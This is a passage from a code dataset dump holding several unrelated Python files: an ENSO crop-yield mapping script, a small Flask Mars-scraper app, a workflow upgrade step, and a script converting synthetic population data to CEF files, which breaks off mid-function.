specified. Failing that it will \n look for a django setting: SERVER_ROOT_URL. Failing that, it defaults\n to localhost:8000.\n '''\n if request:\n return request.build_absolute_uri(relative_path)\n elif hasattr(settings, \"SERVER_ROOT_URL\"):\n return \"%s%s\" % (settings.SERVER_ROOT_URL, relative_path)\n else:\n return \"http://localhost:8000%s\" % relative_path\n ","sub_path":"apps/hq/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"76753491","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 24 23:33:01 2016\n@author: westonanderson\n\nEstimates of ENSO induced yield variability trends\n\nAnalysis Structure\n1. Establish that trends in production variability exist\n2. Establish that ENSO is the dominant driver of production variability\n3. Remove ENSO-induced changes in production, look at remaining trends in variability\n4. Estimate possible trends in ENSO-induced production variability via\n\t4.0. Phase randomization of production PCs directly\n 4.1 Regress onto current yields, phase randomize ENSO\n\t4.2. Regression onto paleo estimates of ENSO\n\t4.3. Regression onto CMIP-5 estimates of ENSO?\n5. Compare observed production variability over the latter period (1996-2010) \n and early period (1980-1995) to possible production variability in 15 yr windows\n\n\nEDIT - 12/17/16 - script created to compare to the multi-EOF function\n\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport time\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\nfrom matplotlib.patches import Polygon\nfrom scipy import stats\nimport matplotlib.cm as cm\nfrom matplotlib.colors import Normalize\nstart = time.clock()\n\npvalThresh = 1\ncrops = ['maize']#,'maize','soy','wheat']#\nloadNotes = '_pacBasin' #'_US_long'\navg = 'mean'#'median' or 'mean'\ncomps = ['LN'] #EN, LN or diff\nclrMax = .25\nclrBr = np.arange(-clrMax,clrMax+.01,.01)\nnorm = Normalize(vmin=-clrMax, vmax=clrMax, clip=False)\nmapper=cm.ScalarMappable(norm=norm, cmap='BrBG')\n\n#ENyrs = np.array([1982, 1986, 1991, 1994, 1997, 2002, 2004, 2006, 2009]) #EN, not possible with SWC included\n#LNyrs = np.array([1983, 1988, 1995, 1998, 2007, 2010]) #LN, not possible with SWC included\n\n#Composites built on +/- 0.5 SST anomaly in NDJ\nENyrs = np.array([1982, 1986, 1987, 1991, 1994, 1997, 2002, 2004, 2006, 2009]) \nLNyrs = np.array([1983, 1984, 1988, 1995, 1996, 1998, 1999, 2000, 2005, 2007, 2008, 2010])\n\n\n\n#^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*#\n# Helper Functions #\n#^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*#\n#Read in moving average. \n# moving_average(a, smooth)\nexec(open('/Users/weston/Desktop/Columbia/Research/Code/PyCode/general/helper_Functions/movingAverage.py').read())\n#Read in moving standard deviation moving_std(a, smooth)\nexec(open('/Users/weston/Desktop/Columbia/Research/Code/PyCode/general/helper_Functions/movingStd.py').read())\n#create surrogate timeseries\n#follows from Ebusuzaki (1997) and Schrieber and Shmitz (2000)\n# function call is ############ surrogate(input TS): ############ #\nexec(open('/Users/weston/Desktop/Columbia/Research/Code/PyCode/general/helper_Functions/surrogateData.py').read())\n#GADM dict to link to shapefiles\nexec(open('/Users/weston/Desktop/Columbia/Research/Code/PyCode/general/helper_Functions/GADM_dict.py').read())\n\n#^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*#\n# Calculate trends in variability #\n#^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*#\nfor comp in comps:\n for crop in crops:\n if crop is 'soy': \n LNyr='LN'\n chnLag = '' #'CHNlag' or ''\n usLag = '' #'USlag' or ''\n elif crop is 'maize':\n LNyr='LN'\n chnLag = 'CHNlag'\n usLag = ''\n elif crop is 'wheat': \n LNyr='LN'\n chnLag = 'CHNlag'\n usLag = 'USlag'\n if loadNotes == '_pacBasin':\n ensoMon =11\n yrMin = '1980'\n yrMax = '2010'\n csvNameMin = '1980'\n csvNameMax = '2010'\n elif loadNotes == '_US_long':\n if (crop == 'wheat'):\n ensoMon =11\n yrMin = '1925'\n yrMax = '2013'\n csvNameMin = '1925'\n csvNameMax = '2015'\n elif (crop == 'maize'):\n ensoMon =11\n yrMin = '1925'\n yrMax = '2013'\n csvNameMin = '1900'\n csvNameMax = '2015'\n elif (crop == 'soy'):\n ensoMon =11\n yrMin = '1925'\n yrMax = '2013'\n csvNameMin = '1925'\n csvNameMax = '2015' \n stOffset =int(yrMin)- int(csvNameMin)\n endOffset =int(yrMax)- int(csvNameMin)+1\n \n \n CRdata = pd.DataFrame.from_csv('/Volumes/Data_Archive/Results/globalCorrelatedRisks/'+\n 'cropYieldEOFs/ProductionAnoms/rawData_'+crop+'_'+csvNameMin+'_'+csvNameMax+LNyr+loadNotes+usLag+chnLag+'.csv')\n CRdata.set_index(['state','year'],drop=True,inplace=True)\n \n CRexp = np.zeros([1,CRdata.index.levels[1].size])\n CRpctAnom = np.zeros([CRdata.index.levels[0].size,int(yrMax)-int(yrMin)+1])\n \n #CRwgt = CRdata['expectedProdGau'].loc[:,2010].values/np.nansum(CRdata['expectedProdGau'].loc[:,2010].values)\n #CRwgt[np.isnan(CRwgt)]=0\n CRwgt = np.ones([CRdata.index.levels[0].size])\n CRha = CRdata['Harvested_Area'].loc[:,2010].values\n \n yr = 0\n for iyr in range(int(yrMin),int(yrMax)+1):\n CRexp[0,yr]=np.nansum(CRdata['expectedProdGau'].loc[:,iyr])\n CRpctAnom[:,yr] = CRdata['prodAnomGau'].loc[:,iyr].values / CRexp[0,yr]\n yr=yr+1\n \n CRpct_EN = CRpctAnom[:,ENyrs-int(yrMin)]\n CRpct_LN = CRpctAnom[:,LNyrs-int(yrMin)]\n if comp is 'diff':\n if avg is 'median':\n CRpct_diff = np.nanmedian(CRpct_EN,1)-np.nanmedian(CRpct_LN,1)\n elif avg is 'mean':\n CRpct_diff = np.nanmean(CRpct_EN,1)-np.nanmean(CRpct_LN,1)\n CRpVal = stats.ttest_ind(CRpct_EN,CRpct_LN,axis=1,equal_var='True').pvalue\n CRpct_diff = ((CRpct_diff)*100)\n elif comp is 'EN':\n if avg is 'median':\n CRpct_diff = np.nanmedian(CRpct_EN,1)\n elif avg is 'mean':\n CRpct_diff = np.nanmean(CRpct_EN,1)\n CRpVal = stats.ttest_1samp(CRpct_EN,0,axis=1).pvalue\n CRpct_diff = ((CRpct_diff)*100)\n elif comp is 'LN':\n if avg is 'median':\n CRpct_diff = np.nanmedian(CRpct_LN,1)\n elif avg is 'mean':\n CRpct_diff = np.nanmean(CRpct_LN,1)\n CRpVal = stats.ttest_1samp(CRpct_LN,0,axis=1).pvalue\n CRpct_diff = ((CRpct_diff)*100)\n eof_states = CRdata['prodAnomGau'].loc[:,2010].index.values\n\n #calibrate the color bar for later\n #clMin = -np.nanmax(np.nanmax(CRpct_diff),-np.nanmin(CRpct_diff))\n #clMax = np.nanmax(np.nanmax(CRpct_diff),-np.nanmin(CRpct_diff))\n #clDelt = (clMin-clMax)/25\n #clrBr = np.arange(clMin,clMax+clDelt,clDelt)\n #norm = Normalize(vmin=clMin, vmax=clMax, clip=True)\n #mapper=cm.ScalarMappable(norm=norm, cmap='BrBG')\n CRpct_diff[(CRpVal>pvalThresh)]=0\n CRpct_diff[np.isnan(CRpct_diff)]=0\n \n if crop is 'maize': \n plt.figure()\n m = Basemap(llcrnrlon=-120,llcrnrlat=10,urcrnrlon=-65,urcrnrlat=50,\n lat_1=30,lat_2=50,lat_0=40,lon_0=-100,projection='lcc')\n USshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/USA_adm_shp/USA_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if (shape_dict['HASC_1']=='US.AK')|(shape_dict['HASC_1']=='US.DC')|(shape_dict['HASC_1']=='US.HI'):\n colors[shape_dict['HASC_1']]=0\n elif len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly) \n \n MXshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/MEX_adm_shp/MEX_adm1', \n name='states', drawbounds=True)\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly)\n mapper.set_array(clrBr);plt.colorbar(mapper)\n plt.savefig('/Users/weston/Desktop/Columbia/Research/Results/ENSO_varTrnds/yldComposite/'+crop+'/NorthAmerica_'+avg+comp+str(pvalThresh)+'.png')\n plt.close()\n elif crop is 'soy':\n plt.figure()\n m = Basemap(llcrnrlon=-120,llcrnrlat=15,urcrnrlon=-65,urcrnrlat=50,\n lat_1=30,lat_2=50,lat_0=40,lon_0=-100,projection='lcc')\n USshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/USA_adm_shp/USA_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if (shape_dict['HASC_1']=='US.AK')|(shape_dict['HASC_1']=='US.DC')|(shape_dict['HASC_1']=='US.HI'):\n colors[shape_dict['HASC_1']]=0\n elif len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly) \n mapper.set_array(clrBr);plt.colorbar(mapper)\n plt.savefig('/Users/weston/Desktop/Columbia/Research/Results/ENSO_varTrnds/yldComposite/'+crop+'/NorthAmerica_'+avg+comp+str(pvalThresh)+'.png')\n plt.close() \n elif crop is 'wheat': \n plt.figure()\n m = Basemap(llcrnrlon=-120,llcrnrlat=20,urcrnrlon=-40,urcrnrlat=60,\n lat_1=35,lat_2=55,lat_0=45,lon_0=-100,projection='lcc')\n USshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/USA_adm_shp/USA_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if (shape_dict['HASC_1']=='US.AK')|(shape_dict['HASC_1']=='US.DC')|(shape_dict['HASC_1']=='US.HI'):\n colors[shape_dict['HASC_1']]=0\n elif len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly) \n \n CAshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/CAN_adm_shp/CAN_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly)\n mapper.set_array(clrBr);plt.colorbar(mapper)\n plt.savefig('/Users/weston/Desktop/Columbia/Research/Results/ENSO_varTrnds/yldComposite/'+crop+'/NorthAmerica_'+avg+usLag+comp+str(pvalThresh)+'.png')\n plt.close() \n \n plt.figure()\n m = Basemap(llcrnrlon=95,llcrnrlat=-45,urcrnrlon=155,urcrnrlat=0, \n lat_1=-15,lat_2=-35,lat_0=-25,lon_0=120,projection='lcc')\n AUshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/AUS_adm_shp/AUS_adm1', \n name='states', drawbounds=True)\n \n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly)\n mapper.set_array(clrBr);plt.colorbar(mapper)\n plt.savefig('/Users/weston/Desktop/Columbia/Research/Results/ENSO_varTrnds/yldComposite/'+crop+'/Australia_'+avg+usLag+comp+str(pvalThresh)+'.png')\n plt.close() \n \n plt.figure()\n m = Basemap(llcrnrlon=88,llcrnrlat=11,urcrnrlon=145,urcrnrlat=55,\n lat_1=45,lat_2=65,lat_0=55,lon_0=120,projection='lcc')\n CNshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/CHN_adm_shp/CHN_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if (shape_dict['HASC_1']=='CN.XZ')|(shape_dict['HASC_1']=='CN.TJ'):\n colors[shape_dict['HASC_1']]=0\n elif len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly) \n mapper.set_array(clrBr);plt.colorbar(mapper)\n plt.savefig('/Users/weston/Desktop/Columbia/Research/Results/ENSO_varTrnds/yldComposite/'+crop+'/China_'+avg+chnLag+comp+str(pvalThresh)+'.png')\n plt.close() \n \n plt.figure()\n m = Basemap(llcrnrlon=-90,llcrnrlat=-60,urcrnrlon=-25,urcrnrlat=10,\n lat_1=-15,lat_2=-5,lat_0=-10,lon_0=-70,projection='lcc')\n BRshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/BRA_adm_shp/BRA_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if (shape_dict['HASC_1']=='BR.AM'):\n colors[shape_dict['HASC_1']]=0\n elif len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly) \n ARshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/ARG_adm_shp/ARG_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if (shape_dict['HASC_1']=='AR.DF')|(shape_dict['HASC_1']=='AR.SC')|(shape_dict['HASC_1']=='AR.TF'):\n colors[shape_dict['HASC_1']]=0\n elif len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly) \n mapper.set_array(clrBr);plt.colorbar(mapper)\n plt.savefig('/Users/weston/Desktop/Columbia/Research/Results/ENSO_varTrnds/yldComposite/'+crop+'/SouthAmerica_'+avg+comp+str(pvalThresh)+'.png')\n plt.close() ","sub_path":"ENSO induced variability composite.py","file_name":"ENSO induced variability composite.py","file_ext":"py","file_size_in_byte":18494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"350251895","text":"from flask import Flask, render_template\nfrom scrape_mars import scrape\nimport datetime as dt\nimport pymongo\n\n# Initialize flask app\napp = Flask(__name__)\n\n# Establish mongo connection, db, and collection\nconn = 'mongodb://localhost:27017'\nclient = pymongo.MongoClient(conn)\ndb = client.mars_db\nmars = db.mars_scrape\n\n# Home Route\n@app.route('/')\ndef index():\n mars_dict = db.mars.find_one()\n # Need to find newest entry\n # scrapeQ = db.mars.find().sort({'scrape_date' : -1})\n return render_template('index.html', mars_dict = mars_dict)\n\n@app.route('/scraper')\ndef scraper():\n # Run scrape function to gather mars data\n mars_dict = scrape()\n mars_dict['scrape_date'] = dt.datetime.now()\n db.mars.insert_one(mars_dict)\n return render_template('index.html', mars_dict = mars_dict)\n\n\n# Debugger on\nif __name__ == \"__main__\":\n app.run(debug = True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"401157705","text":"# -*- coding:utf-8 -*-\n# create_time: 2018/7/6 10:04\n__author__ = 'brad'\n\nimport sys\nprint(sys.getdefaultencoding())\n\n\nclass a(object):\n def __init__(self, b):\n self.b = b\n\n @classmethod\n def test(cls, b):\n return cls(*[b])\n\n\nc = a.test(u'这个')\nprint(c.b)\n","sub_path":"a_concept/unicode_learn/py2-learn.py","file_name":"py2-learn.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"64369070","text":"from ftw.upgrade import UpgradeStep\n\n\nclass UpdateTaskTemplateFolderWorkflow(UpgradeStep):\n \"\"\"Update task template folder workflow.\n \"\"\"\n\n def __call__(self):\n self.install_upgrade_profile()\n self.update_workflow_security(\n ['opengever_tasktemplatefolder_workflow'],\n reindex_security=False)\n","sub_path":"opengever/tasktemplates/upgrades/20170516145806_update_task_template_folder_workflow/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"63400616","text":"import argparse\nimport csv\nimport numpy as np\nimport os\nimport pandas as pd\n\n# Still not sure what version is used for\nVERSION = 12345\n\ndef get_script_args():\n parser = argparse.ArgumentParser(\n description='Convert synthetic population file to CEF formatted person and unit files'\n )\n parser.add_argument(\n 'grfc_path', \n metavar='GRFC_PATH', \n help='path to grfc file that will be used to run the DAS'\n )\n parser.add_argument(\n 'synth_path',\n metavar='SYNTH_PATH',\n help=('path to synthetic population file to convert - '\n 'if path is a single file, will convert only that file,'\n 'if path is a directory, will convert all the files in the' \n 'given directory (one level deep)')\n )\n\n args = parser.parse_args()\n\n grfc_path = os.path.expanduser(os.path.expandvars(args.grfc_path))\n\n if not os.path.exists(grfc_path):\n print(f'Error: Could not find grfc file path: {grfc_path}')\n exit(1)\n\n synth_path = os.path.expanduser(os.path.expandvars(args.synth_path))\n\n if not os.path.exists(synth_path):\n print(f'Error: Could not find synthetic population file path: {synth_path}')\n exit(1)\n\n return (grfc_path, synth_path)\n\ndef gen_mafids(hh_gb):\n group_keys = hh_gb.groups.keys()\n\n return dict(zip(group_keys, range(len(group_keys))))\n\n\ndef load_synth_df(grfc_path, synth_path):\n\n if os.path.isdir(synth_path):\n dfs = (pd.read_csv(os.path.join(synth_path, path), index_col=0) \n for path in os.listdir(synth_path)\n if os.path.isfile(os.path.join(synth_path, path)))\n synth_df = pd.concat(dfs) \n else:\n synth_df = pd.read_csv(synth_path, index_col=0)\n\n grfc_df = pd.read_csv(\n grfc_path, \n delimiter='|', \n usecols=[\n 'TABBLKST', \n 'TABBLKCOU',\n 'TABTRACTCE',\n 'TABBLKGRPCE', \n 'TABBLK', \n 'OIDTABBLK'\n ]\n )\n # Not sure if there's a better way to do this...\n grfc_df['geoid'] = (\n grfc_df['TABBLKST'].astype(str).str.zfill(2)\n + grfc_df['TABBLKCOU'].astype(str).str.zfill(3)\n + grfc_df['TABTRACTCE'].astype(str).str.zfill(6)\n + grfc_df['TABBLK'].astype(str).str.zfill(4)\n ).astype(int)\n\n # TODO: Our massive GRFC file doesn't have a lot of blocks still\n # Might be worth inquiring with the Census bureau about this\n return synth_df.join(\n grfc_df.set_index('geoid'), \n on='geoid'\n ).dropna(subset=['OIDTABBLK']).reset_index().astype(int)\n\ndef build_per_df(synth_df, hh_gb, mafids):\n per_fields = ['RTYPE', 'MAFID', 'CUF_PNC', 'BCUSTATEFP', 'VERSION', 'QSEX', 'QAGE', 'QDB', 'QDOB_MONTH', 'QDOB_DAY', 'QDOB_YEAR', 'QSPAN', 'QSPANX', 'CENHISP', 'QRACE1', 'QRACE2', 'QRACE3', 'QRACE4', 'QRACE5', 'QRACE6', 'QRACE7', 'QRACE8', 'QRACEX', 'CENRACE', 'RACE2010', 'RELSHIP', 'QGQTYP', 'LIVE_ALONE']\n per_df = pd.DataFrame(index=np.arange(synth_df.shape[0]), columns=per_fields)\n\n per_df['RTYPE'] = np.where(synth_df['relationship'].isin([37, 38]), 5, 3)\n # Need to add 100000001 to make the value valid\n per_df['MAFID'] = synth_df.apply(\n lambda row: mafids[(row['geoid'], row['hh_id'])] + 100000001,\n axis=1\n )\n # TODO: still don't know what CUF_PNC is\n per_df['CUF_PNC'] = 12345\n per_df['BCUSTATEFP'] = synth_df['state']\n # TODO: also don't know what VERSION is\n per_df['VERSION'] = VERSION\n per_df['QSEX'] = synth_df['sex_id']\n per_df['QAGE'] = synth_df['age']\n per_df['QDOB_YEAR'] = 2020 - synth_df['age']\n # TODO: do we care about birth month/day?\n per_df['QDOB_MONTH'] = 1\n per_df['QDOB_DAY'] = 1\n per_df['QDB'] = (per_df['QDOB_YEAR'].astype(str) \n + per_df['QDOB_MONTH'].astype(str).str.zfill(2)\n + per_df['QDOB_DAY'].astype(str).str.zfill(2))\n # TODO: don't know exactly what the Edit/Allocation group is\n per_df['QRACEX'] = 1\n per_df['QSPANX'] = 1\n # TODO: don't know exactly what the Q codes are\n per_df['QSPAN'] = 1000\n per_df['QRACE1'] = 1000\n per_df['QRACE2'] = 1000\n per_df['QRACE3'] = 1000\n per_df['QRACE4'] = 1000\n per_df['QRACE5'] = 1000\n per_df['QRACE6'] = 1000\n per_df['QRACE7'] = 1000\n per_df['QRACE8'] = 1000\n per_df['CENRACE'] = synth_df.apply(lambda row: get_cenrace(\n row['racsor'],\n row['racnhpi'],\n row['racasn'],\n row['racaian'],\n row['racblk'],\n row['racwht']\n ), axis=1).astype(str).str.zfill(2)\n per_df['RACE2010'] = synth_df.apply(lambda row: get_race2010(\n row['racnhpi'],\n row['racasn'],\n row['racaian'],\n row['racblk'],\n row['racwht']\n ), axis=1).astype(str).str.zfill(2)\n # For some reason CENHISP is 1 and 2 instead of 0 and 1...\n per_df['CENHISP'] = synth_df['hispanic'] + 1\n # RELSHIP range seems to be 20-38 but not documented anywhere\n per_df['RELSHIP'] = synth_df['relationship']\n # NIU but 000 isn't allowed?\n per_df['QGQTYP'] = ' '\n # Everyone living alone (for now)\n per_df['LIVE_ALONE'] = synth_df.apply(\n lambda row: 0 if hh_gb.get_group((row['geoid'], row['hh_id'])).shape[0] > 1 else 1,\n axis=1\n )\n \n return per_df\n\ndef write_unit_df(synth_df, per_df, hh_gb, mafids):\n with open('converted_synth_unit.cef', 'w', newline='') as unit_file:\n unit_writer = csv.writer(unit_file, delimiter='|')\n\n for (geoid, hh_id), household in hh_gb:\n mafid = mafids[(geoid, hh_id)]\n unit_writer.writerow(get_unit_row(household, hh_id, mafid))\n \ndef get_unit_row(household, hh_id, mafid):\n head_of_household = get_head_of_household(household)\n unit_rtype = 4 if household['relationship'].isin([37, 38]).any() else 2\n # TODO: this is always free and clear - should we set it to something else?\n unit_ten = 2\n unit_paoc = get_paoc(household, unit_rtype)\n # why don't these just match? :(\n # Should be able to subtract 1 from person RTYPE\n return [\n unit_rtype, # RTYPE\n 100000001 + mafid, # MAFID\n head_of_household['state'].item(), # BCUSTATEFP\n VERSION, # VERSION\n household.shape[0], # FINAL_POP\n head_of_household['age'] if head_of_household['age'] >= 15 else 15, # HHLDRAGE\n get_hhspan(household, unit_rtype), # HHSPAN\n 1, # HHLDRACE - CEF validator describes as \"Edited QRACEX of householder\", not sure what that means\n str(get_hhrace(household, unit_rtype)).zfill(2), # HHRACE\n unit_ten, # TEN\n # Zero clue what these are still, we will match TEN for now\n unit_ten, # TEN_A\n unit_ten, # TEN_R\n 0, # VACS - I think should be NIU since it's not vacant\n ' ', # QGQTYP - TODO: Do we want to assign a GQ type?\n ' ', # GQSEX - CEF Validator says \"GQ Unit Sex Composition Flag\"???\n head_of_household['OIDTABBLK'].astype(np.int64).item(), # OIDTB\n get_hht(household, unit_rtype), # HHT\n str(get_hht2(household, unit_rtype)).zfill(2), # HHT2\n get_cplt(household, unit_rtype), # CPLT\n get_upart(household, unit_rtype), # UPART\n get_multg(household, unit_rtype), # MULTG\n get_paoc(household, unit_rtype), # PAOC\n get_p18(household, unit_rtype), # P18\n get_p60(household, unit_rtype), # P60\n get_p65(household, unit_rtype), # P65\n get_p75(household, unit_rtype), # P75\n 1 if unit_paoc in [1, 2, 3] else 0, # PAC\n get_hhsex(household, unit_rtype), # HHSEX\n ]\n\ndef get_head_of_household(household):\n possible = household[household['relationship'].isin([20])]\n if possible.shape[0] > 0:\n # Arbitrarily return first row\n return possible.iloc[0]\n else:\n # Arbitrarily return first row\n # TODO: it'd be nice to be able to rely on having a householder\n # Then we can replace this case with a error\n return household.iloc[0]\n\ndef get_hht(household, rtype):\n hhsize = household.shape[0]\n rels = household['relationship']\n rels_no_hh = rels[rels != 20]\n hhsex = get_head_of_household(household)['sex_id'].item()\n # 14 is female householder nonfamily\n if (rtype == 4) or (rtype == 2 and hhsize == 0):\n return 0\n elif (hhsize > 1) and (rels.isin([21, 23]).any()):\n return 1\n elif (hhsize > 1) and (hhsex == 1) and (rels.isin(np.arange(25, 34)).any()):\n return 2\n elif (hhsize > 1) and (hhsex == 2) and (rels.isin(np.arange(25, 34)).any()):\n return 3\n elif (hhsize == 1) and (hhsex == 1):\n return 4\n elif (hhsize > 1) and (hhsex == 1) and (rels_no_hh.isin([22, 24, 34, 35, 36]).all()):\n return 5\n elif (hhsize == 1) and (hhsex == 2):\n return 6\n elif (hhsize > 1) and (hhsex == 2) and (rels_no_hh.isin([22, 24, 34, 35, 36]).all()):\n return 7\n else:\n hh_id = household['hh_id'].iloc[0].item()\n raise ValueError(f\"Could not generate hht for household w/id: {hh_id}\\n\"\n f\"Household relationships: {list(rels)}\")\n\ndef get_hht2(household, rtype):\n hhsize = household.shape[0]\n household_under_18 = household[household['age'] < 18]\n rels = household['relationship']\n rels_under_18 = household_under_18['relationship']\n hhsex = get_head_of_household(household)['sex_id'].item()\n if (rtype == 4) or (rtype == 2 and hhsize == 0):\n return 0\n elif (hhsize > 1) and (rels.isin([21, 23]).any()) and (rels_under_18.isin([25, 26, 27]).any()):\n return 1\n elif (hhsize > 1) and (rels.isin([21, 23]).any()):\n return 2\n elif (hhsize > 1) and (rels.isin([22, 24]).any()) and (rels_under_18.isin([25, 26, 27]).any()):\n return 3\n elif (hhsize > 1) and (rels.isin([22, 24]).any()):\n return 4\n elif (hhsize == 1) and (hhsex == 2):\n return 5\n elif (hhsize > 1) and (hhsex == 2) and (rels_under_18.isin([25, 26, 27]).any()):\n return 6\n elif (hhsize > 1) and (hhsex == 2) and (rels.isin(np.arange(25, 34)).any()):\n return 7\n elif (hhsize > 1) and (hhsex == 2) and (rels.isin([34, 35, 36]).any()):\n return 8\n elif (hhsize == 1) and (hhsex == 1):\n return 9\n elif (hhsize > 1) and (hhsex == 1) and (rels_under_18.isin([25, 26, 27]).any()):\n return 10\n elif (hhsize > 1) and (hhsex == 1) and 